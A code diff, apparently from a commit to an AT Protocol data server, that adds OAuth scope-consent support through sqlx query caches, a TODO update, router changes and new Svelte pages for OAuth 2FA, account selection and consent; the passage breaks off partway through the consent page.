+17
.sqlx/query-0dfe6b602497942ce871d9b54f4d34ae9e846f3bb9f8693ecd6d90463e83d114.json
+17
.sqlx/query-0dfe6b602497942ce871d9b54f4d34ae9e846f3bb9f8693ecd6d90463e83d114.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n INSERT INTO oauth_scope_preference (did, client_id, scope, granted, created_at, updated_at)\n VALUES ($1, $2, $3, $4, NOW(), NOW())\n ON CONFLICT (did, client_id, scope) DO UPDATE SET granted = $4, updated_at = NOW()\n ",
4
+
"describe": {
5
+
"columns": [],
6
+
"parameters": {
7
+
"Left": [
8
+
"Text",
9
+
"Text",
10
+
"Text",
11
+
"Bool"
12
+
]
13
+
},
14
+
"nullable": []
15
+
},
16
+
"hash": "0dfe6b602497942ce871d9b54f4d34ae9e846f3bb9f8693ecd6d90463e83d114"
17
+
}
+29
.sqlx/query-10429e16b7a6bb2d97728526d921027c873c8c2d31e695a14241220c1339937f.json
+29
.sqlx/query-10429e16b7a6bb2d97728526d921027c873c8c2d31e695a14241220c1339937f.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n SELECT scope, granted FROM oauth_scope_preference\n WHERE did = $1 AND client_id = $2\n ",
4
+
"describe": {
5
+
"columns": [
6
+
{
7
+
"ordinal": 0,
8
+
"name": "scope",
9
+
"type_info": "Text"
10
+
},
11
+
{
12
+
"ordinal": 1,
13
+
"name": "granted",
14
+
"type_info": "Bool"
15
+
}
16
+
],
17
+
"parameters": {
18
+
"Left": [
19
+
"Text",
20
+
"Text"
21
+
]
22
+
},
23
+
"nullable": [
24
+
false,
25
+
false
26
+
]
27
+
},
28
+
"hash": "10429e16b7a6bb2d97728526d921027c873c8c2d31e695a14241220c1339937f"
29
+
}
+22
.sqlx/query-1407d741caf7e074347e6cfdff07b3f72f02571976d875d5c75542c69f0fcdfe.json
+22
.sqlx/query-1407d741caf7e074347e6cfdff07b3f72f02571976d875d5c75542c69f0fcdfe.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "SELECT r.repo_root_cid FROM repos r JOIN users u ON r.user_id = u.id WHERE u.did = $1",
4
+
"describe": {
5
+
"columns": [
6
+
{
7
+
"ordinal": 0,
8
+
"name": "repo_root_cid",
9
+
"type_info": "Text"
10
+
}
11
+
],
12
+
"parameters": {
13
+
"Left": [
14
+
"Text"
15
+
]
16
+
},
17
+
"nullable": [
18
+
false
19
+
]
20
+
},
21
+
"hash": "1407d741caf7e074347e6cfdff07b3f72f02571976d875d5c75542c69f0fcdfe"
22
+
}
+29
.sqlx/query-15144f5e5d9853126a59f36b2cbd1f8eea4fe719c6cba9406a9843bea2f8dc9e.json
+29
.sqlx/query-15144f5e5d9853126a59f36b2cbd1f8eea4fe719c6cba9406a9843bea2f8dc9e.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n INSERT INTO repo_seq (did, event_type, commit_cid, prev_cid, ops, blobs, blocks_cids, prev_data_cid)\n VALUES ($1, $2, $3, $4, $5, $6, $7, $8)\n RETURNING seq\n ",
4
+
"describe": {
5
+
"columns": [
6
+
{
7
+
"ordinal": 0,
8
+
"name": "seq",
9
+
"type_info": "Int8"
10
+
}
11
+
],
12
+
"parameters": {
13
+
"Left": [
14
+
"Text",
15
+
"Text",
16
+
"Text",
17
+
"Text",
18
+
"Jsonb",
19
+
"TextArray",
20
+
"TextArray",
21
+
"Text"
22
+
]
23
+
},
24
+
"nullable": [
25
+
false
26
+
]
27
+
},
28
+
"hash": "15144f5e5d9853126a59f36b2cbd1f8eea4fe719c6cba9406a9843bea2f8dc9e"
29
+
}
+26
.sqlx/query-53b0ea60a759f8bb37d01461fd0769dcc683e796287e41d5180340296286fcbe.json
+26
.sqlx/query-53b0ea60a759f8bb37d01461fd0769dcc683e796287e41d5180340296286fcbe.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n INSERT INTO repo_seq (did, event_type, commit_cid, prev_cid, ops, blobs, blocks_cids)\n VALUES ($1, 'commit', $2, $2, $3, $4, $5)\n RETURNING seq\n ",
4
+
"describe": {
5
+
"columns": [
6
+
{
7
+
"ordinal": 0,
8
+
"name": "seq",
9
+
"type_info": "Int8"
10
+
}
11
+
],
12
+
"parameters": {
13
+
"Left": [
14
+
"Text",
15
+
"Text",
16
+
"Jsonb",
17
+
"TextArray",
18
+
"TextArray"
19
+
]
20
+
},
21
+
"nullable": [
22
+
false
23
+
]
24
+
},
25
+
"hash": "53b0ea60a759f8bb37d01461fd0769dcc683e796287e41d5180340296286fcbe"
26
+
}
+15
.sqlx/query-833816de8586d7a886a14698a734c0dad7952676303749d140294c46b9536b91.json
+15
.sqlx/query-833816de8586d7a886a14698a734c0dad7952676303749d140294c46b9536b91.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n UPDATE oauth_authorization_request\n SET parameters = jsonb_set(parameters, '{scope}', to_jsonb($2::text))\n WHERE id = $1\n ",
4
+
"describe": {
5
+
"columns": [],
6
+
"parameters": {
7
+
"Left": [
8
+
"Text",
9
+
"Text"
10
+
]
11
+
},
12
+
"nullable": []
13
+
},
14
+
"hash": "833816de8586d7a886a14698a734c0dad7952676303749d140294c46b9536b91"
15
+
}
+15
.sqlx/query-859a028033a1c7f66fd16843a357aa9f67b3fec5dac616edef36fbeb143d76f0.json
+15
.sqlx/query-859a028033a1c7f66fd16843a357aa9f67b3fec5dac616edef36fbeb143d76f0.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n DELETE FROM oauth_scope_preference\n WHERE did = $1 AND client_id = $2\n ",
4
+
"describe": {
5
+
"columns": [],
6
+
"parameters": {
7
+
"Left": [
8
+
"Text",
9
+
"Text"
10
+
]
11
+
},
12
+
"nullable": []
13
+
},
14
+
"hash": "859a028033a1c7f66fd16843a357aa9f67b3fec5dac616edef36fbeb143d76f0"
15
+
}
-34
.sqlx/query-94966f20b7b0adb02e8c83a693a4dcc7f54b72983ba8ebd66fd805851db5c06c.json
-34
.sqlx/query-94966f20b7b0adb02e8c83a693a4dcc7f54b72983ba8ebd66fd805851db5c06c.json
···
1
-
{
2
-
"db_name": "PostgreSQL",
3
-
"query": "SELECT preferred_comms_channel as \"channel: CommsChannel\" FROM users WHERE did = $1",
4
-
"describe": {
5
-
"columns": [
6
-
{
7
-
"ordinal": 0,
8
-
"name": "channel: CommsChannel",
9
-
"type_info": {
10
-
"Custom": {
11
-
"name": "comms_channel",
12
-
"kind": {
13
-
"Enum": [
14
-
"email",
15
-
"discord",
16
-
"telegram",
17
-
"signal"
18
-
]
19
-
}
20
-
}
21
-
}
22
-
}
23
-
],
24
-
"parameters": {
25
-
"Left": [
26
-
"Text"
27
-
]
28
-
},
29
-
"nullable": [
30
-
false
31
-
]
32
-
},
33
-
"hash": "94966f20b7b0adb02e8c83a693a4dcc7f54b72983ba8ebd66fd805851db5c06c"
34
-
}
···
+16
.sqlx/query-a4e657ed91c9ecfcf419deeae5f42ede88cddc842bdf37f2ef082b252ab1642c.json
+16
.sqlx/query-a4e657ed91c9ecfcf419deeae5f42ede88cddc842bdf37f2ef082b252ab1642c.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n UPDATE oauth_authorization_request\n SET did = $2, device_id = $3\n WHERE id = $1\n ",
4
+
"describe": {
5
+
"columns": [],
6
+
"parameters": {
7
+
"Left": [
8
+
"Text",
9
+
"Text",
10
+
"Text"
11
+
]
12
+
},
13
+
"nullable": []
14
+
},
15
+
"hash": "a4e657ed91c9ecfcf419deeae5f42ede88cddc842bdf37f2ef082b252ab1642c"
16
+
}
+22
.sqlx/query-bcee8331c85a558fa1e9177759f23cc69b40bf8d2fc1cb0d1d4cf2499a753e5b.json
+22
.sqlx/query-bcee8331c85a558fa1e9177759f23cc69b40bf8d2fc1cb0d1d4cf2499a753e5b.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "SELECT deactivated_at IS NULL FROM users WHERE id = $1",
4
+
"describe": {
5
+
"columns": [
6
+
{
7
+
"ordinal": 0,
8
+
"name": "?column?",
9
+
"type_info": "Bool"
10
+
}
11
+
],
12
+
"parameters": {
13
+
"Left": [
14
+
"Uuid"
15
+
]
16
+
},
17
+
"nullable": [
18
+
null
19
+
]
20
+
},
21
+
"hash": "bcee8331c85a558fa1e9177759f23cc69b40bf8d2fc1cb0d1d4cf2499a753e5b"
22
+
}
+9
-3
.sqlx/query-c47715c259bb7b56b576d9719f8facb87a9e9b6b530ca6f81ce308a4c584c002.json
.sqlx/query-2b6987e2a4139bfbd262682a309ebabde5e48a5cabe08a5a2135e8856efd844d.json
+9
-3
.sqlx/query-c47715c259bb7b56b576d9719f8facb87a9e9b6b530ca6f81ce308a4c584c002.json
.sqlx/query-2b6987e2a4139bfbd262682a309ebabde5e48a5cabe08a5a2135e8856efd844d.json
···
1
{
2
"db_name": "PostgreSQL",
3
-
"query": "SELECT id, deactivated_at, takedown_ref FROM users WHERE did = $1",
4
"describe": {
5
"columns": [
6
{
···
10
},
11
{
12
"ordinal": 1,
13
"name": "deactivated_at",
14
"type_info": "Timestamptz"
15
},
16
{
17
-
"ordinal": 2,
18
"name": "takedown_ref",
19
"type_info": "Text"
20
}
···
26
},
27
"nullable": [
28
false,
29
true,
30
true
31
]
32
},
33
-
"hash": "c47715c259bb7b56b576d9719f8facb87a9e9b6b530ca6f81ce308a4c584c002"
34
}
···
1
{
2
"db_name": "PostgreSQL",
3
+
"query": "SELECT id, handle, deactivated_at, takedown_ref FROM users WHERE did = $1",
4
"describe": {
5
"columns": [
6
{
···
10
},
11
{
12
"ordinal": 1,
13
+
"name": "handle",
14
+
"type_info": "Text"
15
+
},
16
+
{
17
+
"ordinal": 2,
18
"name": "deactivated_at",
19
"type_info": "Timestamptz"
20
},
21
{
22
+
"ordinal": 3,
23
"name": "takedown_ref",
24
"type_info": "Text"
25
}
···
31
},
32
"nullable": [
33
false,
34
+
false,
35
true,
36
true
37
]
38
},
39
+
"hash": "2b6987e2a4139bfbd262682a309ebabde5e48a5cabe08a5a2135e8856efd844d"
40
}
+15
.sqlx/query-ca6196defa93057f20220f433e79e4d2cdd5d6cda0add6e5d56471cd319f92cd.json
+15
.sqlx/query-ca6196defa93057f20220f433e79e4d2cdd5d6cda0add6e5d56471cd319f92cd.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "DELETE FROM oauth_token WHERE did = $1 AND client_id = $2",
4
+
"describe": {
5
+
"columns": [],
6
+
"parameters": {
7
+
"Left": [
8
+
"Text",
9
+
"Text"
10
+
]
11
+
},
12
+
"nullable": []
13
+
},
14
+
"hash": "ca6196defa93057f20220f433e79e4d2cdd5d6cda0add6e5d56471cd319f92cd"
15
+
}
-29
.sqlx/query-d7d7e002dcdc663811303411c1200ef4509aef9416a177dc6888a8e2648b173f.json
-29
.sqlx/query-d7d7e002dcdc663811303411c1200ef4509aef9416a177dc6888a8e2648b173f.json
···
1
-
{
2
-
"db_name": "PostgreSQL",
3
-
"query": "\n INSERT INTO repo_seq (did, event_type, commit_cid, prev_cid, ops, blobs, blocks_cids, prev_data_cid)\n VALUES ($1, $2, $3, $4, $5, $6, $7, $8)\n RETURNING seq\n ",
4
-
"describe": {
5
-
"columns": [
6
-
{
7
-
"ordinal": 0,
8
-
"name": "seq",
9
-
"type_info": "Int8"
10
-
}
11
-
],
12
-
"parameters": {
13
-
"Left": [
14
-
"Text",
15
-
"Text",
16
-
"Text",
17
-
"Text",
18
-
"Jsonb",
19
-
"TextArray",
20
-
"TextArray",
21
-
"Text"
22
-
]
23
-
},
24
-
"nullable": [
25
-
false
26
-
]
27
-
},
28
-
"hash": "d7d7e002dcdc663811303411c1200ef4509aef9416a177dc6888a8e2648b173f"
29
-
}
···
-22
.sqlx/query-ed34111a7f41b419a23d16ddd23cbc6aff9ab373946ff243512c52f857b7980d.json
-22
.sqlx/query-ed34111a7f41b419a23d16ddd23cbc6aff9ab373946ff243512c52f857b7980d.json
···
1
-
{
2
-
"db_name": "PostgreSQL",
3
-
"query": "SELECT 1 as one FROM users WHERE handle = $1",
4
-
"describe": {
5
-
"columns": [
6
-
{
7
-
"ordinal": 0,
8
-
"name": "one",
9
-
"type_info": "Int4"
10
-
}
11
-
],
12
-
"parameters": {
13
-
"Left": [
14
-
"Text"
15
-
]
16
-
},
17
-
"nullable": [
18
-
null
19
-
]
20
-
},
21
-
"hash": "ed34111a7f41b419a23d16ddd23cbc6aff9ab373946ff243512c52f857b7980d"
22
-
}
···
+1
Cargo.lock
+1
Cargo.lock
+1
Cargo.toml
+1
Cargo.toml
+3
-13
TODO.md
+3
-13
TODO.md
···
2
3
## Active development
4
5
-
### OAuth scope authorization UI
6
-
Display and manage OAuth scopes during authorization flows.
7
-
8
-
- [ ] Parse and display requested scopes from authorization request
9
-
- [ ] Human-readable scope descriptions (e.g., "Read your posts" not "app.bsky.feed.read")
10
-
- [ ] Group scopes by category (read, write, admin, etc.)
11
-
- [ ] Allow users to uncheck optional scopes before authorizing
12
-
- [ ] Distinguish required vs optional scopes in UI
13
-
- [ ] Remember scope preferences per client (don't ask again for same scopes)
14
-
- [ ] Token endpoint respects user's scope selections
15
-
- [ ] Protected endpoints check token scopes before allowing operations
16
-
17
### Frontend
18
So like... make the thing unique, make it cool.
19
···
90
91
OAuth 2.1: Authorization server metadata, JWKS, PAR, authorize endpoint with login UI, token endpoint (auth code + refresh), revocation, introspection, DPoP, PKCE S256, client metadata validation, private_key_jwt verification.
92
93
App endpoints: getPreferences, putPreferences, getProfile, getProfiles, getTimeline, getAuthorFeed, getActorLikes, getPostThread, getFeed, registerPush (all with local-first + proxy fallback).
94
95
Infrastructure: Sequencer with cursor replay, postgres repo storage with atomic transactions, valkey DID cache, debounced crawler notifications with circuit breakers, multi-channel notifications (email/Discord/Telegram/Signal), image processing, distributed rate limiting, security hardening.
96
97
-
Web UI: OAuth login, registration, email verification, password reset, multi-account selector, dashboard, sessions, app passwords, invites, notification preferences, repo browser, CAR export, admin panel.
98
99
Auth: ES256K + HS256 dual support, JTI-only token storage, refresh token family tracking, encrypted signing keys (AES-256-GCM), DPoP replay protection, constant-time comparisons.
···
2
3
## Active development
4
5
### Frontend
6
So like... make the thing unique, make it cool.
7
···
78
79
OAuth 2.1: Authorization server metadata, JWKS, PAR, authorize endpoint with login UI, token endpoint (auth code + refresh), revocation, introspection, DPoP, PKCE S256, client metadata validation, private_key_jwt verification.
80
81
+
OAuth Scope Enforcement: Full granular scope system with consent UI, human-readable scope descriptions, per-client scope preferences, scope parsing (repo/blob/rpc/account/identity), endpoint-level scope checks, DPoP token support in auth extractors, token revocation on re-authorization, response_mode support (query/fragment).
82
+
83
App endpoints: getPreferences, putPreferences, getProfile, getProfiles, getTimeline, getAuthorFeed, getActorLikes, getPostThread, getFeed, registerPush (all with local-first + proxy fallback).
84
85
Infrastructure: Sequencer with cursor replay, postgres repo storage with atomic transactions, valkey DID cache, debounced crawler notifications with circuit breakers, multi-channel notifications (email/Discord/Telegram/Signal), image processing, distributed rate limiting, security hardening.
86
87
+
Web UI: OAuth login, registration, email verification, password reset, multi-account selector, dashboard, sessions, app passwords, invites, notification preferences, repo browser, CAR export, admin panel, OAuth consent screen with scope selection.
88
89
Auth: ES256K + HS256 dual support, JTI-only token storage, refresh token family tracking, encrypted signing keys (AES-256-GCM), DPoP replay protection, constant-time comparisons.
+15
frontend/src/App.svelte
+15
frontend/src/App.svelte
···
13
import Notifications from './routes/Notifications.svelte'
14
import RepoExplorer from './routes/RepoExplorer.svelte'
15
import Admin from './routes/Admin.svelte'
16
17
const auth = getAuthState()
18
···
46
return RepoExplorer
47
case '/admin':
48
return Admin
49
default:
50
return auth.session ? Dashboard : Login
51
}
···
13
import Notifications from './routes/Notifications.svelte'
14
import RepoExplorer from './routes/RepoExplorer.svelte'
15
import Admin from './routes/Admin.svelte'
16
+
import OAuthConsent from './routes/OAuthConsent.svelte'
17
+
import OAuthLogin from './routes/OAuthLogin.svelte'
18
+
import OAuthAccounts from './routes/OAuthAccounts.svelte'
19
+
import OAuth2FA from './routes/OAuth2FA.svelte'
20
+
import OAuthError from './routes/OAuthError.svelte'
21
22
const auth = getAuthState()
23
···
51
return RepoExplorer
52
case '/admin':
53
return Admin
54
+
case '/oauth/consent':
55
+
return OAuthConsent
56
+
case '/oauth/login':
57
+
return OAuthLogin
58
+
case '/oauth/accounts':
59
+
return OAuthAccounts
60
+
case '/oauth/2fa':
61
+
return OAuth2FA
62
+
case '/oauth/error':
63
+
return OAuthError
64
default:
65
return auth.session ? Dashboard : Login
66
}
+7
-2
frontend/src/lib/router.svelte.ts
+7
-2
frontend/src/lib/router.svelte.ts
···
1
+
let currentPath = $state(getPathWithoutQuery(window.location.hash.slice(1) || '/'))
2
+
3
+
function getPathWithoutQuery(hash: string): string {
4
+
const queryIndex = hash.indexOf('?')
5
+
return queryIndex === -1 ? hash : hash.slice(0, queryIndex)
6
+
}
7
8
window.addEventListener('hashchange', () => {
9
+
currentPath = getPathWithoutQuery(window.location.hash.slice(1) || '/')
10
})
11
12
export function navigate(path: string) {
+213
frontend/src/routes/OAuth2FA.svelte
+213
frontend/src/routes/OAuth2FA.svelte
···
···
1
+
<script lang="ts">
2
+
import { navigate } from '../lib/router.svelte'
3
+
4
+
let code = $state('')
5
+
let submitting = $state(false)
6
+
let error = $state<string | null>(null)
7
+
8
+
function getRequestUri(): string | null {
9
+
const params = new URLSearchParams(window.location.hash.split('?')[1] || '')
10
+
return params.get('request_uri')
11
+
}
12
+
13
+
function getChannel(): string {
14
+
const params = new URLSearchParams(window.location.hash.split('?')[1] || '')
15
+
return params.get('channel') || 'email'
16
+
}
17
+
18
+
async function handleSubmit(e: Event) {
19
+
e.preventDefault()
20
+
const requestUri = getRequestUri()
21
+
if (!requestUri) {
22
+
error = 'Missing request_uri parameter'
23
+
return
24
+
}
25
+
26
+
submitting = true
27
+
error = null
28
+
29
+
try {
30
+
const response = await fetch('/oauth/authorize/2fa', {
31
+
method: 'POST',
32
+
headers: {
33
+
'Content-Type': 'application/json',
34
+
'Accept': 'application/json'
35
+
},
36
+
body: JSON.stringify({
37
+
request_uri: requestUri,
38
+
code: code.trim()
39
+
})
40
+
})
41
+
42
+
const data = await response.json()
43
+
44
+
if (!response.ok) {
45
+
error = data.error_description || data.error || 'Verification failed'
46
+
submitting = false
47
+
return
48
+
}
49
+
50
+
if (data.redirect_uri) {
51
+
window.location.href = data.redirect_uri
52
+
return
53
+
}
54
+
55
+
error = 'Unexpected response from server'
56
+
submitting = false
57
+
} catch {
58
+
error = 'Failed to connect to server'
59
+
submitting = false
60
+
}
61
+
}
62
+
63
+
function handleCancel() {
64
+
const requestUri = getRequestUri()
65
+
if (requestUri) {
66
+
navigate(`/oauth/login?request_uri=${encodeURIComponent(requestUri)}`)
67
+
} else {
68
+
window.history.back()
69
+
}
70
+
}
71
+
72
+
let channel = $derived(getChannel())
73
+
</script>
74
+
75
+
<div class="oauth-2fa-container">
76
+
<h1>Two-Factor Authentication</h1>
77
+
<p class="subtitle">
78
+
A verification code has been sent to your {channel}.
79
+
Enter the code below to continue.
80
+
</p>
81
+
82
+
{#if error}
83
+
<div class="error">{error}</div>
84
+
{/if}
85
+
86
+
<form onsubmit={handleSubmit}>
87
+
<div class="field">
88
+
<label for="code">Verification Code</label>
89
+
<input
90
+
id="code"
91
+
type="text"
92
+
bind:value={code}
93
+
placeholder="Enter 6-digit code"
94
+
disabled={submitting}
95
+
required
96
+
maxlength="6"
97
+
pattern="[0-9]{6}"
98
+
autocomplete="one-time-code"
99
+
inputmode="numeric"
100
+
/>
101
+
</div>
102
+
103
+
<div class="actions">
104
+
<button type="button" class="cancel-btn" onclick={handleCancel} disabled={submitting}>
105
+
Cancel
106
+
</button>
107
+
<button type="submit" class="submit-btn" disabled={submitting || code.trim().length !== 6}>
108
+
{submitting ? 'Verifying...' : 'Verify'}
109
+
</button>
110
+
</div>
111
+
</form>
112
+
</div>
113
+
114
+
<style>
115
+
.oauth-2fa-container {
116
+
max-width: 400px;
117
+
margin: 4rem auto;
118
+
padding: 2rem;
119
+
}
120
+
121
+
h1 {
122
+
margin: 0 0 0.5rem 0;
123
+
}
124
+
125
+
.subtitle {
126
+
color: var(--text-secondary);
127
+
margin: 0 0 2rem 0;
128
+
}
129
+
130
+
form {
131
+
display: flex;
132
+
flex-direction: column;
133
+
gap: 1rem;
134
+
}
135
+
136
+
.field {
137
+
display: flex;
138
+
flex-direction: column;
139
+
gap: 0.25rem;
140
+
}
141
+
142
+
label {
143
+
font-size: 0.875rem;
144
+
font-weight: 500;
145
+
}
146
+
147
+
input {
148
+
padding: 0.75rem;
149
+
border: 1px solid var(--border-color-light);
150
+
border-radius: 4px;
151
+
font-size: 1.5rem;
152
+
letter-spacing: 0.5em;
153
+
text-align: center;
154
+
background: var(--bg-input);
155
+
color: var(--text-primary);
156
+
}
157
+
158
+
input:focus {
159
+
outline: none;
160
+
border-color: var(--accent);
161
+
}
162
+
163
+
.error {
164
+
padding: 0.75rem;
165
+
background: var(--error-bg);
166
+
border: 1px solid var(--error-border);
167
+
border-radius: 4px;
168
+
color: var(--error-text);
169
+
margin-bottom: 1rem;
170
+
}
171
+
172
+
.actions {
173
+
display: flex;
174
+
gap: 1rem;
175
+
margin-top: 0.5rem;
176
+
}
177
+
178
+
.actions button {
179
+
flex: 1;
180
+
padding: 0.75rem;
181
+
border: none;
182
+
border-radius: 4px;
183
+
font-size: 1rem;
184
+
cursor: pointer;
185
+
transition: background-color 0.15s;
186
+
}
187
+
188
+
.actions button:disabled {
189
+
opacity: 0.6;
190
+
cursor: not-allowed;
191
+
}
192
+
193
+
.cancel-btn {
194
+
background: var(--bg-secondary);
195
+
color: var(--text-primary);
196
+
border: 1px solid var(--border-color);
197
+
}
198
+
199
+
.cancel-btn:hover:not(:disabled) {
200
+
background: var(--error-bg);
201
+
border-color: var(--error-border);
202
+
color: var(--error-text);
203
+
}
204
+
205
+
.submit-btn {
206
+
background: var(--accent);
207
+
color: white;
208
+
}
209
+
210
+
.submit-btn:hover:not(:disabled) {
211
+
background: var(--accent-hover);
212
+
}
213
+
</style>
+264
frontend/src/routes/OAuthAccounts.svelte
+264
frontend/src/routes/OAuthAccounts.svelte
···
···
1
+
<script lang="ts">
2
+
import { navigate } from '../lib/router.svelte'
3
+
4
+
interface AccountInfo {
5
+
did: string
6
+
handle: string
7
+
email: string
8
+
}
9
+
10
+
let loading = $state(true)
11
+
let error = $state<string | null>(null)
12
+
let submitting = $state(false)
13
+
let accounts = $state<AccountInfo[]>([])
14
+
15
+
function getRequestUri(): string | null {
16
+
const params = new URLSearchParams(window.location.hash.split('?')[1] || '')
17
+
return params.get('request_uri')
18
+
}
19
+
20
+
async function fetchAccounts() {
21
+
const requestUri = getRequestUri()
22
+
if (!requestUri) {
23
+
error = 'Missing request_uri parameter'
24
+
loading = false
25
+
return
26
+
}
27
+
28
+
try {
29
+
const response = await fetch(`/oauth/authorize/accounts?request_uri=${encodeURIComponent(requestUri)}`)
30
+
if (!response.ok) {
31
+
const data = await response.json()
32
+
error = data.error_description || data.error || 'Failed to load accounts'
33
+
loading = false
34
+
return
35
+
}
36
+
const data = await response.json()
37
+
accounts = data.accounts || []
38
+
} catch {
39
+
error = 'Failed to connect to server'
40
+
} finally {
41
+
loading = false
42
+
}
43
+
}
44
+
45
+
async function handleSelectAccount(did: string) {
46
+
const requestUri = getRequestUri()
47
+
if (!requestUri) {
48
+
error = 'Missing request_uri parameter'
49
+
return
50
+
}
51
+
52
+
submitting = true
53
+
error = null
54
+
55
+
try {
56
+
const response = await fetch('/oauth/authorize/select', {
57
+
method: 'POST',
58
+
headers: {
59
+
'Content-Type': 'application/json',
60
+
'Accept': 'application/json'
61
+
},
62
+
body: JSON.stringify({
63
+
request_uri: requestUri,
64
+
did
65
+
})
66
+
})
67
+
68
+
const data = await response.json()
69
+
70
+
if (!response.ok) {
71
+
error = data.error_description || data.error || 'Selection failed'
72
+
submitting = false
73
+
return
74
+
}
75
+
76
+
if (data.needs_2fa) {
77
+
navigate(`/oauth/2fa?request_uri=${encodeURIComponent(requestUri)}&channel=${encodeURIComponent(data.channel || '')}`)
78
+
return
79
+
}
80
+
81
+
if (data.redirect_uri) {
82
+
window.location.href = data.redirect_uri
83
+
return
84
+
}
85
+
86
+
error = 'Unexpected response from server'
87
+
submitting = false
88
+
} catch {
89
+
error = 'Failed to connect to server'
90
+
submitting = false
91
+
}
92
+
}
93
+
94
+
function handleDifferentAccount() {
95
+
const requestUri = getRequestUri()
96
+
if (requestUri) {
97
+
navigate(`/oauth/login?request_uri=${encodeURIComponent(requestUri)}`)
98
+
} else {
99
+
navigate('/oauth/login')
100
+
}
101
+
}
102
+
103
+
$effect(() => {
104
+
fetchAccounts()
105
+
})
106
+
</script>
107
+
108
+
<div class="oauth-accounts-container">
109
+
{#if loading}
110
+
<div class="loading">
111
+
<p>Loading accounts...</p>
112
+
</div>
113
+
{:else if error}
114
+
<div class="error-container">
115
+
<h1>Error</h1>
116
+
<div class="error">{error}</div>
117
+
<button type="button" onclick={handleDifferentAccount}>
118
+
Sign in with different account
119
+
</button>
120
+
</div>
121
+
{:else}
122
+
<h1>Choose an Account</h1>
123
+
<p class="subtitle">Select an account to continue</p>
124
+
125
+
<div class="accounts-list">
126
+
{#each accounts as account}
127
+
<button
128
+
type="button"
129
+
class="account-item"
130
+
class:disabled={submitting}
131
+
onclick={() => !submitting && handleSelectAccount(account.did)}
132
+
>
133
+
<div class="account-info">
134
+
<span class="account-handle">@{account.handle}</span>
135
+
<span class="account-email">{account.email}</span>
136
+
</div>
137
+
</button>
138
+
{/each}
139
+
</div>
140
+
141
+
<button type="button" class="secondary different-account" onclick={handleDifferentAccount}>
142
+
Sign in to different account
143
+
</button>
144
+
{/if}
145
+
</div>
146
+
147
+
<style>
148
+
.oauth-accounts-container {
149
+
max-width: 400px;
150
+
margin: 4rem auto;
151
+
padding: 2rem;
152
+
}
153
+
154
+
h1 {
155
+
margin: 0 0 0.5rem 0;
156
+
}
157
+
158
+
.subtitle {
159
+
color: var(--text-secondary);
160
+
margin: 0 0 2rem 0;
161
+
}
162
+
163
+
.loading {
164
+
display: flex;
165
+
align-items: center;
166
+
justify-content: center;
167
+
min-height: 200px;
168
+
color: var(--text-secondary);
169
+
}
170
+
171
+
.error-container {
172
+
text-align: center;
173
+
}
174
+
175
+
.error {
176
+
padding: 0.75rem;
177
+
background: var(--error-bg);
178
+
border: 1px solid var(--error-border);
179
+
border-radius: 4px;
180
+
color: var(--error-text);
181
+
margin-bottom: 1rem;
182
+
}
183
+
184
+
.accounts-list {
185
+
display: flex;
186
+
flex-direction: column;
187
+
gap: 0.5rem;
188
+
margin-bottom: 1rem;
189
+
}
190
+
191
+
.account-item {
192
+
display: flex;
193
+
align-items: center;
194
+
padding: 1rem;
195
+
background: var(--bg-card);
196
+
border: 1px solid var(--border-color);
197
+
border-radius: 8px;
198
+
cursor: pointer;
199
+
text-align: left;
200
+
width: 100%;
201
+
transition: border-color 0.15s, box-shadow 0.15s;
202
+
}
203
+
204
+
.account-item:hover:not(.disabled) {
205
+
border-color: var(--accent);
206
+
box-shadow: 0 2px 8px rgba(77, 166, 255, 0.15);
207
+
}
208
+
209
+
.account-item.disabled {
210
+
opacity: 0.6;
211
+
cursor: not-allowed;
212
+
}
213
+
214
+
.account-info {
215
+
display: flex;
216
+
flex-direction: column;
217
+
gap: 0.25rem;
218
+
}
219
+
220
+
.account-handle {
221
+
font-weight: 500;
222
+
color: var(--text-primary);
223
+
}
224
+
225
+
.account-email {
226
+
font-size: 0.875rem;
227
+
color: var(--text-secondary);
228
+
}
229
+
230
+
button {
231
+
padding: 0.75rem;
232
+
background: var(--accent);
233
+
color: white;
234
+
border: none;
235
+
border-radius: 4px;
236
+
font-size: 1rem;
237
+
cursor: pointer;
238
+
}
239
+
240
+
button:hover:not(:disabled) {
241
+
background: var(--accent-hover);
242
+
}
243
+
244
+
button:disabled {
245
+
opacity: 0.6;
246
+
cursor: not-allowed;
247
+
}
248
+
249
+
button.secondary {
250
+
background: transparent;
251
+
color: var(--accent);
252
+
border: 1px solid var(--accent);
253
+
width: 100%;
254
+
}
255
+
256
+
button.secondary:hover:not(:disabled) {
257
+
background: var(--accent);
258
+
color: white;
259
+
}
260
+
261
+
.different-account {
262
+
margin-top: 1rem;
263
+
}
264
+
</style>
+451
frontend/src/routes/OAuthConsent.svelte
+451
frontend/src/routes/OAuthConsent.svelte
···
···
1
+
<script lang="ts">
2
+
import { navigate } from '../lib/router.svelte'
3
+
4
+
interface ScopeInfo {
5
+
scope: string
6
+
category: string
7
+
required: boolean
8
+
description: string
9
+
display_name: string
10
+
granted: boolean | null
11
+
}
12
+
13
+
interface ConsentData {
14
+
request_uri: string
15
+
client_id: string
16
+
client_name: string | null
17
+
client_uri: string | null
18
+
logo_uri: string | null
19
+
scopes: ScopeInfo[]
20
+
show_consent: boolean
21
+
did: string
22
+
}
23
+
24
+
let loading = $state(true)
25
+
let error = $state<string | null>(null)
26
+
let submitting = $state(false)
27
+
let consentData = $state<ConsentData | null>(null)
28
+
let scopeSelections = $state<Record<string, boolean>>({})
29
+
let rememberChoice = $state(false)
30
+
31
+
function getRequestUri(): string | null {
32
+
const params = new URLSearchParams(window.location.hash.split('?')[1] || '')
33
+
return params.get('request_uri')
34
+
}
35
+
36
+
async function fetchConsentData() {
37
+
const requestUri = getRequestUri()
38
+
if (!requestUri) {
39
+
error = 'Missing request_uri parameter'
40
+
loading = false
41
+
return
42
+
}
43
+
44
+
try {
45
+
